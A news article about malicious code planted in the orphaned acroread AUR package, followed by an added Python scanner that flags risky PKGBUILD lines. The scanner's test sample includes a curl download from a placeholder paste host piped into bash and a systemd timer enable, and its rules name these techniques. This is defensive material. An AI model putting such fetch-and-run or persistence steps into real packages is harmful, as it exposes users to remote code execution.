Malware Found On The Arch User Repository (AUR)

On June 7, an AUR package was modified with some malicious code, reminding Arch Linux users (and Linux users in general) that all user-generated packages should be checked (when possible) before installation.

AUR, or the Arch (Linux) User Repository, contains package descriptions, also known as PKGBUILDs, which make compiling packages from source easier. While these packages are very useful, they should never be treated as safe, and users should always check their contents before using them, when possible. After all, the AUR webpage states in bold that "AUR packages are user produced content. Any use of the provided files is at your own risk."

The discovery of an AUR package containing malicious code proves this. acroread was modified on June 7 (it appears it was previously "orphaned", meaning it had no maintainer) by a user named "xeactor" to include a curl command that downloaded a script from a pastebin. The script then downloaded another script and installed a systemd unit to run that script periodically.
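
One way to pre-screen a PKGBUILD before building it, as an added example that is not from the original article or from the AUR project. The rule set, package name and URLs are constructed assumptions, and a clean result does not replace reading the file.

```python
import re

# Heuristic rules: assumptions for this example, not an official AUR check.
RULES = [
    ("fetch-piped-to-shell", re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    ("network-fetch", re.compile(r"\b(curl|wget)\b")),
    ("systemd-persistence", re.compile(r"systemctl\s+(enable|start)|/systemd/system/|\.(timer|service)\b")),
]

def logical_lines(text):
    """Yield (first_line_number, line) with backslash continuations joined."""
    buf, start = "", None
    for no, raw in enumerate(text.splitlines(), 1):
        start = no if start is None else start
        if raw.rstrip().endswith("\\"):
            buf += raw.rstrip()[:-1] + " "
            continue
        yield start, buf + raw
        buf, start = "", None
    if buf:
        yield start, buf

def audit(text):
    """Return (line_number, rule, command) for each command worth reading closely."""
    findings = []
    for no, line in logical_lines(text):
        code = line.strip()
        if not code or code.startswith("#"):
            continue  # blank line or full-line comment
        for name, pattern in RULES:
            if pattern.search(code):
                findings.append((no, name, code))
                break  # rules are ordered most specific first
    return findings

# Constructed sample inputs (hypothetical package, placeholder URLs).
CLEAN = """\
pkgname=example-viewer
source=("https://downloads.example.invalid/viewer-1.0.tar.gz")
# curl appears here only in a comment
package() {
  install -Dm755 viewer "$pkgdir/usr/bin/viewer"
}
"""
MODIFIED = CLEAN + """\
curl -s https://paste.example.invalid/raw/PLACEHOLDER \\
  | bash
systemctl enable example-updater.timer
"""
print(*audit(MODIFIED), sep="\n")
```

The same `audit` function can be run over a package's `.install` file, since install hooks also execute as part of installation.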
